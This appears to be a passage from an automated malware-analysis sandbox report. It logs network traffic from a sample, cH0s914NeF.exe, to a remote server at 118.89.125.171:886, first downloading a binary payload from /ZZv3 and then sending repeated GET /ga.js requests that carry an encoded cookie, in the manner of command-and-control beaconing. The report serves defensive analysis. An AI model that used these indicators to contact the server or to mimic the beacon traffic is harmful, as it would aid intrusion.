Apr 20, 2024 15:23:40.844296932 CEST	886	49842	118.89.125.171	192.168.2.5
Apr 20, 2024 15:23:40.844356060 CEST	49842	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:23:40.844357014 CEST	49842	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:23:40.844491959 CEST	49842	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:23:40.958753109 CEST	49843	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:23:41.282032013 CEST	886	49843	118.89.125.171	192.168.2.5
Apr 20, 2024 15:23:41.282155991 CEST	49843	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:23:41.282506943 CEST	49843	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:23:41.601429939 CEST	886	49843	118.89.125.171	192.168.2.5
Apr 20, 2024 15:23:41.604232073 CEST	886	49843	118.89.125.171	192.168.2.5
Apr 20, 2024 15:23:41.604291916 CEST	886	49843	118.89.125.171	192.168.2.5
Apr 20, 2024 15:23:41.604342937 CEST	49843	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:23:41.604419947 CEST	49843	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:23:41.604449034 CEST	49843	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:23:41.626044989 CEST	49842	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:23:41.752732992 CEST	49844	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:23:41.927784920 CEST	886	49843	118.89.125.171	192.168.2.5
Apr 20, 2024 15:23:41.931492090 CEST	886	49842	118.89.125.171	192.168.2.5
Apr 20, 2024 15:23:42.066494942 CEST	886	49844	118.89.125.171	192.168.2.5
Apr 20, 2024 15:23:42.066689014 CEST	49844	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:23:42.066878080 CEST	49844	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:23:42.378149033 CEST	886	49844	118.89.125.171	192.168.2.5
Apr 20, 2024 15:23:42.381027937 CEST	886	49844	118.89.125.171	192.168.2.5
Apr 20, 2024 15:23:42.381103992 CEST	886	49844	118.89.125.171	192.168.2.5
Apr 20, 2024 15:23:42.381129026 CEST	49844	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:23:42.381162882 CEST	49844	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:23:42.384140015 CEST	49844	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:23:42.505578995 CEST	49845	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:23:42.699914932 CEST	886	49844	118.89.125.171	192.168.2.5
Apr 20, 2024 15:23:42.833626032 CEST	886	49845	118.89.125.171	192.168.2.5
Apr 20, 2024 15:23:42.833761930 CEST	49845	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:23:42.833945990 CEST	49845	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:23:43.159651041 CEST	886	49845	118.89.125.171	192.168.2.5
Apr 20, 2024 15:23:43.164864063 CEST	886	49845	118.89.125.171	192.168.2.5
Apr 20, 2024 15:23:43.164930105 CEST	886	49845	118.89.125.171	192.168.2.5
Apr 20, 2024 15:23:43.165052891 CEST	49845	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:23:43.165196896 CEST	49845	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:23:43.286843061 CEST	49846	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:23:43.616846085 CEST	886	49846	118.89.125.171	192.168.2.5
Apr 20, 2024 15:23:43.616944075 CEST	49846	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:23:43.617100000 CEST	49846	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:23:43.939243078 CEST	886	49846	118.89.125.171	192.168.2.5
Apr 20, 2024 15:23:43.941934109 CEST	886	49846	118.89.125.171	192.168.2.5
Apr 20, 2024 15:23:43.942013025 CEST	49846	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:23:43.942081928 CEST	886	49846	118.89.125.171	192.168.2.5
Apr 20, 2024 15:23:43.942140102 CEST	49846	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:23:43.969777107 CEST	49845	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:23:44.051829100 CEST	49846	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:23:44.052267075 CEST	49847	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:23:44.295772076 CEST	886	49845	118.89.125.171	192.168.2.5
Apr 20, 2024 15:23:44.358238935 CEST	886	49847	118.89.125.171	192.168.2.5
Apr 20, 2024 15:23:44.358449936 CEST	49847	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:23:44.358628035 CEST	49847	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:23:44.372412920 CEST	886	49846	118.89.125.171	192.168.2.5
Apr 20, 2024 15:23:44.666244984 CEST	886	49847	118.89.125.171	192.168.2.5
Apr 20, 2024 15:23:44.667675972 CEST	886	49847	118.89.125.171	192.168.2.5
Apr 20, 2024 15:23:44.667738914 CEST	886	49847	118.89.125.171	192.168.2.5
Apr 20, 2024 15:23:44.667774916 CEST	49847	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:23:44.667844057 CEST	49847	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:23:44.667936087 CEST	49847	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:23:44.788276911 CEST	49848	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:23:45.121714115 CEST	886	49848	118.89.125.171	192.168.2.5
Apr 20, 2024 15:23:45.121869087 CEST	49848	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:23:45.122040033 CEST	49848	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:23:45.438534975 CEST	49847	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:23:45.452575922 CEST	886	49848	118.89.125.171	192.168.2.5
Apr 20, 2024 15:23:45.457865953 CEST	886	49848	118.89.125.171	192.168.2.5
Apr 20, 2024 15:23:45.457906961 CEST	886	49848	118.89.125.171	192.168.2.5
Apr 20, 2024 15:23:45.457942963 CEST	49848	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:23:45.457986116 CEST	49848	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:23:45.458060980 CEST	49848	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:23:45.568217993 CEST	49849	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:23:45.744014025 CEST	886	49847	118.89.125.171	192.168.2.5
Apr 20, 2024 15:23:45.888375044 CEST	886	49849	118.89.125.171	192.168.2.5
Apr 20, 2024 15:23:45.888519049 CEST	49849	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:23:45.888824940 CEST	49849	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:23:46.211275101 CEST	886	49849	118.89.125.171	192.168.2.5
Apr 20, 2024 15:23:46.213836908 CEST	886	49849	118.89.125.171	192.168.2.5
Apr 20, 2024 15:23:46.213881016 CEST	886	49849	118.89.125.171	192.168.2.5
Apr 20, 2024 15:23:46.213907957 CEST	49849	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:23:46.213957071 CEST	49849	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:23:46.221457958 CEST	49849	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:23:46.298053026 CEST	49848	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:23:46.334501028 CEST	49850	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:23:46.541268110 CEST	886	49849	118.89.125.171	192.168.2.5
Apr 20, 2024 15:23:46.645637989 CEST	886	49848	118.89.125.171	192.168.2.5
Apr 20, 2024 15:23:46.675117970 CEST	886	49850	118.89.125.171	192.168.2.5
Apr 20, 2024 15:23:46.675216913 CEST	49850	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:23:46.675436020 CEST	49850	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:23:47.014847040 CEST	886	49850	118.89.125.171	192.168.2.5
Apr 20, 2024 15:23:47.039983988 CEST	886	49850	118.89.125.171	192.168.2.5
Apr 20, 2024 15:23:47.040025949 CEST	886	49850	118.89.125.171	192.168.2.5
Apr 20, 2024 15:23:47.040055990 CEST	49850	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:23:47.040086031 CEST	49850	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:23:47.043078899 CEST	49850	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:23:47.384784937 CEST	886	49850	118.89.125.171	192.168.2.5
Apr 20, 2024 15:23:47.676436901 CEST	49851	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:23:47.990154028 CEST	886	49851	118.89.125.171	192.168.2.5
Apr 20, 2024 15:23:47.990294933 CEST	49851	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:23:47.990454912 CEST	49851	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:23:48.302037001 CEST	886	49851	118.89.125.171	192.168.2.5
Apr 20, 2024 15:23:48.307499886 CEST	886	49851	118.89.125.171	192.168.2.5
Apr 20, 2024 15:23:48.307543039 CEST	886	49851	118.89.125.171	192.168.2.5
Apr 20, 2024 15:23:48.307601929 CEST	49851	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:23:48.307692051 CEST	49851	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:23:48.307693005 CEST	49851	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:23:48.427442074 CEST	49852	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:23:48.746471882 CEST	886	49852	118.89.125.171	192.168.2.5
Apr 20, 2024 15:23:48.746638060 CEST	49852	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:23:48.746864080 CEST	49852	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:23:49.068013906 CEST	886	49852	118.89.125.171	192.168.2.5
Apr 20, 2024 15:23:49.069642067 CEST	886	49852	118.89.125.171	192.168.2.5
Apr 20, 2024 15:23:49.069680929 CEST	886	49852	118.89.125.171	192.168.2.5
Apr 20, 2024 15:23:49.069859982 CEST	49852	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:23:49.069859982 CEST	49852	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:23:49.070005894 CEST	49852	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:23:49.079191923 CEST	49851	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:23:49.193380117 CEST	49853	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:23:49.392946005 CEST	886	49851	118.89.125.171	192.168.2.5
Apr 20, 2024 15:23:49.508294106 CEST	886	49853	118.89.125.171	192.168.2.5
Apr 20, 2024 15:23:49.508403063 CEST	49853	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:23:49.508625984 CEST	49853	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:23:49.821512938 CEST	886	49853	118.89.125.171	192.168.2.5
Apr 20, 2024 15:23:49.826461077 CEST	886	49853	118.89.125.171	192.168.2.5
Apr 20, 2024 15:23:49.826493979 CEST	886	49853	118.89.125.171	192.168.2.5
Apr 20, 2024 15:23:49.826556921 CEST	49853	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:23:49.826728106 CEST	49853	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:23:49.826728106 CEST	49853	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:23:49.876226902 CEST	49852	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:23:49.942672014 CEST	49854	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:23:50.143457890 CEST	886	49853	118.89.125.171	192.168.2.5
Apr 20, 2024 15:23:50.197427034 CEST	886	49852	118.89.125.171	192.168.2.5
Apr 20, 2024 15:23:50.246495962 CEST	886	49854	118.89.125.171	192.168.2.5
Apr 20, 2024 15:23:50.246625900 CEST	49854	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:23:50.246809006 CEST	49854	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:23:50.548284054 CEST	886	49854	118.89.125.171	192.168.2.5
Apr 20, 2024 15:23:50.551213026 CEST	886	49854	118.89.125.171	192.168.2.5
Apr 20, 2024 15:23:50.551232100 CEST	886	49854	118.89.125.171	192.168.2.5
Apr 20, 2024 15:23:50.551428080 CEST	49854	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:23:50.551428080 CEST	49854	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:23:50.690917015 CEST	49855	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:23:50.855173111 CEST	886	49854	118.89.125.171	192.168.2.5
Apr 20, 2024 15:23:51.034617901 CEST	886	49855	118.89.125.171	192.168.2.5
Apr 20, 2024 15:23:51.034866095 CEST	49855	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:23:51.035669088 CEST	49855	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:23:51.380296946 CEST	886	49855	118.89.125.171	192.168.2.5
Apr 20, 2024 15:23:51.382921934 CEST	886	49855	118.89.125.171	192.168.2.5
Apr 20, 2024 15:23:51.382966995 CEST	886	49855	118.89.125.171	192.168.2.5
Apr 20, 2024 15:23:51.383141041 CEST	49855	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:23:51.383310080 CEST	49855	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:23:51.507271051 CEST	49856	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:23:51.820557117 CEST	886	49856	118.89.125.171	192.168.2.5
Apr 20, 2024 15:23:51.820728064 CEST	49856	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:23:51.820933104 CEST	49856	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:23:52.135451078 CEST	886	49856	118.89.125.171	192.168.2.5
Apr 20, 2024 15:23:52.138253927 CEST	886	49856	118.89.125.171	192.168.2.5
Apr 20, 2024 15:23:52.138277054 CEST	886	49856	118.89.125.171	192.168.2.5
Apr 20, 2024 15:23:52.138386011 CEST	49856	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:23:52.138504982 CEST	49856	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:23:52.235419989 CEST	49855	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:23:52.255810976 CEST	49857	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:23:52.564961910 CEST	886	49855	118.89.125.171	192.168.2.5
Apr 20, 2024 15:23:52.569679022 CEST	886	49857	118.89.125.171	192.168.2.5
Apr 20, 2024 15:23:52.569767952 CEST	49857	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:23:52.569936991 CEST	49857	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:23:52.885744095 CEST	886	49857	118.89.125.171	192.168.2.5
Apr 20, 2024 15:23:52.888459921 CEST	886	49857	118.89.125.171	192.168.2.5
Apr 20, 2024 15:23:52.888500929 CEST	886	49857	118.89.125.171	192.168.2.5
Apr 20, 2024 15:23:52.888593912 CEST	49857	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:23:52.888792038 CEST	49857	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:23:52.888792038 CEST	49857	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:23:52.923075914 CEST	49856	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:23:53.008640051 CEST	49858	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:23:53.202789068 CEST	886	49857	118.89.125.171	192.168.2.5
Apr 20, 2024 15:23:53.236485958 CEST	886	49856	118.89.125.171	192.168.2.5
Apr 20, 2024 15:23:53.323584080 CEST	886	49858	118.89.125.171	192.168.2.5
Apr 20, 2024 15:23:53.323733091 CEST	49858	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:23:53.323940039 CEST	49858	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:23:53.662688017 CEST	886	49858	118.89.125.171	192.168.2.5
Apr 20, 2024 15:23:53.665380001 CEST	886	49858	118.89.125.171	192.168.2.5
Apr 20, 2024 15:23:53.665427923 CEST	886	49858	118.89.125.171	192.168.2.5
Apr 20, 2024 15:23:53.665627003 CEST	49858	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:23:53.665627003 CEST	49858	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:23:53.665766954 CEST	49858	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:23:53.854945898 CEST	49859	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:23:53.989870071 CEST	886	49858	118.89.125.171	192.168.2.5
Apr 20, 2024 15:23:54.171304941 CEST	886	49859	118.89.125.171	192.168.2.5
Apr 20, 2024 15:23:54.171462059 CEST	49859	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:23:54.171652079 CEST	49859	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:23:54.485531092 CEST	886	49859	118.89.125.171	192.168.2.5
Apr 20, 2024 15:23:54.488161087 CEST	886	49859	118.89.125.171	192.168.2.5
Apr 20, 2024 15:23:54.488185883 CEST	886	49859	118.89.125.171	192.168.2.5
Apr 20, 2024 15:23:54.488248110 CEST	49859	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:23:54.488400936 CEST	49859	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:23:54.488447905 CEST	49859	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:23:54.616794109 CEST	49860	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:23:54.804092884 CEST	886	49859	118.89.125.171	192.168.2.5
Apr 20, 2024 15:23:54.952728987 CEST	886	49860	118.89.125.171	192.168.2.5
Apr 20, 2024 15:23:54.952841997 CEST	49860	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:23:54.953073025 CEST	49860	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:23:55.266638041 CEST	886	49860	118.89.125.171	192.168.2.5
Apr 20, 2024 15:23:55.271513939 CEST	886	49860	118.89.125.171	192.168.2.5
Apr 20, 2024 15:23:55.271570921 CEST	886	49860	118.89.125.171	192.168.2.5
Apr 20, 2024 15:23:55.271639109 CEST	49860	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:23:55.271730900 CEST	49860	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:23:55.271805048 CEST	49860	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:23:55.397592068 CEST	49861	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:23:55.710876942 CEST	886	49861	118.89.125.171	192.168.2.5
Apr 20, 2024 15:23:55.711062908 CEST	49861	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:23:55.711571932 CEST	49861	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:23:56.026562929 CEST	886	49861	118.89.125.171	192.168.2.5
Apr 20, 2024 15:23:56.028839111 CEST	886	49861	118.89.125.171	192.168.2.5
Apr 20, 2024 15:23:56.028913975 CEST	49861	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:23:56.029129028 CEST	886	49861	118.89.125.171	192.168.2.5
Apr 20, 2024 15:23:56.029189110 CEST	49861	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:23:56.141679049 CEST	49860	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:23:56.150870085 CEST	49861	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:23:56.151262045 CEST	49862	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:23:56.455682039 CEST	886	49860	118.89.125.171	192.168.2.5
Apr 20, 2024 15:23:56.465981960 CEST	886	49861	118.89.125.171	192.168.2.5
Apr 20, 2024 15:23:56.472856045 CEST	886	49862	118.89.125.171	192.168.2.5
Apr 20, 2024 15:23:56.473300934 CEST	49862	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:23:56.473541021 CEST	49862	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:23:56.794769049 CEST	886	49862	118.89.125.171	192.168.2.5
Apr 20, 2024 15:23:56.797075987 CEST	886	49862	118.89.125.171	192.168.2.5
Apr 20, 2024 15:23:56.797096968 CEST	886	49862	118.89.125.171	192.168.2.5
Apr 20, 2024 15:23:56.797133923 CEST	49862	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:23:56.797173023 CEST	49862	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:23:56.797261000 CEST	49862	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:23:56.918829918 CEST	49863	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:23:57.230299950 CEST	886	49863	118.89.125.171	192.168.2.5
Apr 20, 2024 15:23:57.230417967 CEST	49863	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:23:57.230623960 CEST	49863	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:23:57.543030977 CEST	886	49863	118.89.125.171	192.168.2.5
Apr 20, 2024 15:23:57.545744896 CEST	886	49863	118.89.125.171	192.168.2.5
Apr 20, 2024 15:23:57.545806885 CEST	886	49863	118.89.125.171	192.168.2.5
Apr 20, 2024 15:23:57.545829058 CEST	49863	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:23:57.545911074 CEST	49863	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:23:57.558938026 CEST	49863	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:23:57.626036882 CEST	49862	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:23:57.678199053 CEST	49864	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:23:57.870201111 CEST	886	49863	118.89.125.171	192.168.2.5
Apr 20, 2024 15:23:57.946074009 CEST	886	49862	118.89.125.171	192.168.2.5
Apr 20, 2024 15:23:57.991899014 CEST	886	49864	118.89.125.171	192.168.2.5
Apr 20, 2024 15:23:57.993484974 CEST	49864	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:23:57.993652105 CEST	49864	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:23:58.307224035 CEST	886	49864	118.89.125.171	192.168.2.5
Apr 20, 2024 15:23:58.310406923 CEST	886	49864	118.89.125.171	192.168.2.5
Apr 20, 2024 15:23:58.310461998 CEST	886	49864	118.89.125.171	192.168.2.5
Apr 20, 2024 15:23:58.310532093 CEST	49864	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:23:58.310642004 CEST	49864	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:23:58.426131010 CEST	49865	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:23:58.740757942 CEST	886	49865	118.89.125.171	192.168.2.5
Apr 20, 2024 15:23:58.740972996 CEST	49865	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:23:58.741123915 CEST	49865	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:23:59.055469990 CEST	886	49865	118.89.125.171	192.168.2.5
Apr 20, 2024 15:23:59.060419083 CEST	886	49865	118.89.125.171	192.168.2.5
Apr 20, 2024 15:23:59.060496092 CEST	886	49865	118.89.125.171	192.168.2.5
Apr 20, 2024 15:23:59.060524940 CEST	49865	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:23:59.060570002 CEST	49865	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:23:59.060647011 CEST	49865	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:23:59.110413074 CEST	49864	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:23:59.177099943 CEST	49866	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:23:59.424168110 CEST	886	49864	118.89.125.171	192.168.2.5
Apr 20, 2024 15:23:59.477617979 CEST	886	49866	118.89.125.171	192.168.2.5
Apr 20, 2024 15:23:59.477807045 CEST	49866	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:23:59.478089094 CEST	49866	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:23:59.778497934 CEST	886	49866	118.89.125.171	192.168.2.5
Apr 20, 2024 15:23:59.781225920 CEST	886	49866	118.89.125.171	192.168.2.5
Apr 20, 2024 15:23:59.781265020 CEST	886	49866	118.89.125.171	192.168.2.5
Apr 20, 2024 15:23:59.781302929 CEST	49866	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:23:59.781394005 CEST	49866	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:23:59.781425953 CEST	49866	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:23:59.829154968 CEST	49865	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:23:59.895081997 CEST	49867	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:24:00.143656015 CEST	886	49865	118.89.125.171	192.168.2.5
Apr 20, 2024 15:24:00.199783087 CEST	886	49867	118.89.125.171	192.168.2.5
Apr 20, 2024 15:24:00.199871063 CEST	49867	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:24:00.200036049 CEST	49867	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:24:00.507044077 CEST	886	49867	118.89.125.171	192.168.2.5
Apr 20, 2024 15:24:00.509985924 CEST	886	49867	118.89.125.171	192.168.2.5
Apr 20, 2024 15:24:00.510054111 CEST	886	49867	118.89.125.171	192.168.2.5
Apr 20, 2024 15:24:00.510077953 CEST	49867	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:24:00.510152102 CEST	49867	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:24:00.510185003 CEST	49867	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:24:00.532303095 CEST	49866	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:24:00.814516068 CEST	886	49867	118.89.125.171	192.168.2.5
Apr 20, 2024 15:24:00.832873106 CEST	886	49866	118.89.125.171	192.168.2.5

HTTP Request Dependency Graph

118.89.125.171:886

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.5	49706	118.89.125.171	886	4304	C:\Users\user\Desktop\cH0s914NeF.exe

Timestamp	Bytes transferred	Direction	Data
Apr 20, 2024 15:21:54.723893881 CEST	207	OUT	GET /ZZv3 HTTP/1.1 User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows Phone OS 7.5; Trident/5.0; IEMobile/9.0; LG; LG-E906) Host: 118.89.125.171:886 Connection: Keep-Alive Cache-Control: no-cache
Apr 20, 2024 15:21:55.027054071 CEST	120	IN	HTTP/1.1 200 OK Date: Sat, 20 Apr 2024 13:21:54 GMT Content-Type: application/octet-stream Content-Length: 296007

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.5	49707	118.89.125.171	886	4304	C:\Users\user\Desktop\cH0s914NeF.exe

Timestamp	Bytes transferred	Direction	Data
Apr 20, 2024 15:21:56.597330093 CEST	400	OUT	GET /ga.js HTTP/1.1 Accept: / Cookie: cSN0hYAW4Yrm2b2xvVjvCJAjmd1fcL15iOKbMV2Gg+VejBkXEXyaqymoFiDTK28Uc3vfFgvNWkdBi2t9W6uAbxYCZ4tBLaeZO/7MAorozKnVRsjKA4jqkZ5hAg9bpCP8xmRZIy5SpQVFB9BrBk1D5JQUhqeSsp4/jSx7R8QFvyY= User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; 360space) Host: 118.89.125.171:886 Connection: Keep-Alive Cache-Control: no-cache
Apr 20, 2024 15:21:58.697153091 CEST	115	IN	HTTP/1.1 200 OK Date: Sat, 20 Apr 2024 13:21:56 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.5	49708	118.89.125.171	886	4304	C:\Users\user\Desktop\cH0s914NeF.exe

Timestamp	Bytes transferred	Direction	Data
Apr 20, 2024 15:22:00.156812906 CEST	400	OUT	GET /ga.js HTTP/1.1 Accept: / Cookie: cSN0hYAW4Yrm2b2xvVjvCJAjmd1fcL15iOKbMV2Gg+VejBkXEXyaqymoFiDTK28Uc3vfFgvNWkdBi2t9W6uAbxYCZ4tBLaeZO/7MAorozKnVRsjKA4jqkZ5hAg9bpCP8xmRZIy5SpQVFB9BrBk1D5JQUhqeSsp4/jSx7R8QFvyY= User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; 360space) Host: 118.89.125.171:886 Connection: Keep-Alive Cache-Control: no-cache
Apr 20, 2024 15:22:00.501425982 CEST	115	IN	HTTP/1.1 200 OK Date: Sat, 20 Apr 2024 13:22:00 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.5	49709	118.89.125.171	886	4304	C:\Users\user\Desktop\cH0s914NeF.exe

Timestamp	Bytes transferred	Direction	Data
Apr 20, 2024 15:22:00.942385912 CEST	400	OUT	GET /ga.js HTTP/1.1 Accept: / Cookie: cSN0hYAW4Yrm2b2xvVjvCJAjmd1fcL15iOKbMV2Gg+VejBkXEXyaqymoFiDTK28Uc3vfFgvNWkdBi2t9W6uAbxYCZ4tBLaeZO/7MAorozKnVRsjKA4jqkZ5hAg9bpCP8xmRZIy5SpQVFB9BrBk1D5JQUhqeSsp4/jSx7R8QFvyY= User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; 360space) Host: 118.89.125.171:886 Connection: Keep-Alive Cache-Control: no-cache
Apr 20, 2024 15:22:01.259191036 CEST	115	IN	HTTP/1.1 200 OK Date: Sat, 20 Apr 2024 13:22:01 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
